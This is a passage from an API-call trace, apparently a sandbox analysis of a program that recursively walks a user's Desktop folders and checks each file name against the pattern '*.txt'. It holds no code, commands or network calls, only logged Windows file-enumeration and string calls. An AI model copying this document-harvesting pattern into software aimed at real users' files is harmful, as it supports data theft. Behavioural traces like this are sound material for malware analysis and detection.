lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.634] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970fc8 [0110.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x3970fc8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.634] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970fc8 | out: hHeap=0x29a0000) returned 1 [0110.634] PathMatchSpecW (pszFile="s ICeshe.bmp", pszSpec="*.txt") returned 0 [0110.634] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2810 | out: hHeap=0x29a0000) returned 1 [0110.634] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 1 [0110.634] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.634] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.634] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="sQpxS.csv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv" [0110.634] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.634] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.634] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="sQpxS.csv" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\sQpxS.csv") returned="\\KTOu\\UQEQQujqhNYM\\sQpxS.csv" [0110.634] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04e8 [0110.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.634] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2780 [0110.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", cchWideChar=59, lpMultiByteStr=0x29a2780, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", lpUsedDefaultChar=0x0) returned 59 [0110.634] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2db0 [0110.634] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2780 | out: hHeap=0x29a0000) returned 1 [0110.635] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.635] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970fc8 [0110.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x3970fc8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.635] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970fc8 | out: hHeap=0x29a0000) returned 1 [0110.635] PathMatchSpecW (pszFile="sQpxS.csv", pszSpec="*.txt") returned 0 [0110.635] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2db0 | out: hHeap=0x29a0000) returned 1 [0110.635] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 0 [0110.635] FindClose (in: hFindFile=0x743420 | out: hFindFile=0x743420) returned 1 [0110.635] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04e8 [0110.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.635] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x29a0560 [0110.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", cchWideChar=49, lpMultiByteStr=0x29a0560, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpUsedDefaultChar=0x0) returned 49 [0110.635] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2d20 [0110.635] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0560 | out: hHeap=0x29a0000) returned 1 [0110.635] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.635] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970fc8 [0110.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x3970fc8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.635] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970fc8 | out: hHeap=0x29a0000) returned 1 [0110.635] PathMatchSpecW (pszFile="UQEQQujqhNYM", pszSpec="*.txt") returned 0 [0110.635] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d20 | out: hHeap=0x29a0000) returned 1 [0110.635] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 1 [0110.635] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.636] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.636] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.636] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.636] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.636] lstrcatW (in: lpString1="\\KTOu\\", lpString2="_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.636] lstrcmpW (lpString1="_5VgSE0-6jvrM", lpString2=".") returned 1 [0110.636] lstrcmpW (lpString1="_5VgSE0-6jvrM", lpString2="..") returned 1 [0110.636] lstrcpyW (in: lpString1=0x19bf40, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.636] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*" [0110.636] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7436e0 [0110.636] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.636] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.636] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\." [0110.636] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.636] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.636] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="." | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\.") returned="\\KTOu\\_5VgSE0-6jvrM\\." [0110.636] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.636] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.636] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.636] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.636] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\.." [0110.636] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.637] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.637] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2=".." | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\..") returned="\\KTOu\\_5VgSE0-6jvrM\\.." [0110.637] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.637] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.637] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67bd380, ftCreationTime.dwHighDateTime=0x1d7ab0a, ftLastAccessTime.dwLowDateTime=0x1a731140, ftLastAccessTime.dwHighDateTime=0x1d7ad95, ftLastWriteTime.dwLowDateTime=0x1a731140, ftLastWriteTime.dwHighDateTime=0x1d7ad95, nFileSizeHigh=0x0, nFileSizeLow=0xa5ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="aQrMbJ6CFhwhf7PNnuMu.docx", cAlternateFileName="AQRMBJ~1.DOC")) returned 1 [0110.637] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.637] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.637] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="aQrMbJ6CFhwhf7PNnuMu.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx" [0110.637] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.637] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.637] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="aQrMbJ6CFhwhf7PNnuMu.docx" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx") returned="\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx" [0110.637] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a04e8 [0110.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0110.637] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4c) returned 0x39700d0 [0110.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", cchWideChar=76, lpMultiByteStr=0x39700d0, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", lpUsedDefaultChar=0x0) returned 76 [0110.637] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a11c0 [0110.637] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.637] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.637] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac18 [0110.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x29aac18, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.637] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac18 | out: hHeap=0x29a0000) returned 1 [0110.638] PathMatchSpecW (pszFile="aQrMbJ6CFhwhf7PNnuMu.docx", pszSpec="*.txt") returned 0 [0110.638] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0110.638] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2615710, ftCreationTime.dwHighDateTime=0x1d7aff0, ftLastAccessTime.dwLowDateTime=0xec0a4a10, ftLastAccessTime.dwHighDateTime=0x1d7aff3, ftLastWriteTime.dwLowDateTime=0xec0a4a10, ftLastWriteTime.dwHighDateTime=0x1d7aff3, nFileSizeHigh=0x0, nFileSizeLow=0x155c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ge40CUtwTNBApkxPnR.png", cAlternateFileName="GE40CU~1.PNG")) returned 1 [0110.638] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.638] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.638] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="ge40CUtwTNBApkxPnR.png" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png" [0110.638] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.638] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.638] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="ge40CUtwTNBApkxPnR.png" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png") returned="\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png" [0110.638] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a04e8 [0110.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0110.638] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x49) returned 0x39700d0 [0110.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", cchWideChar=73, lpMultiByteStr=0x39700d0, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", lpUsedDefaultChar=0x0) returned 73 [0110.638] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a11c0 [0110.638] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.638] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.640] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac30 [0110.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x29aac30, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.640] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac30 | out: hHeap=0x29a0000) returned 1 [0110.640] PathMatchSpecW (pszFile="ge40CUtwTNBApkxPnR.png", pszSpec="*.txt") returned 0 [0110.640] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0110.640] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b17880, ftCreationTime.dwHighDateTime=0x1d7ad02, ftLastAccessTime.dwLowDateTime=0xd0a9b460, ftLastAccessTime.dwHighDateTime=0x1d7ae48, ftLastWriteTime.dwLowDateTime=0xd0a9b460, ftLastWriteTime.dwHighDateTime=0x1d7ae48, nFileSizeHigh=0x0, nFileSizeLow=0x8a52, dwReserved0=0x0, dwReserved1=0x0, cFileName="QXzQAUh0jIi.bmp", cAlternateFileName="QXZQAU~1.BMP")) returned 1 [0110.640] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.640] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.640] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="QXzQAUh0jIi.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp" [0110.640] lstrcpyW (in: 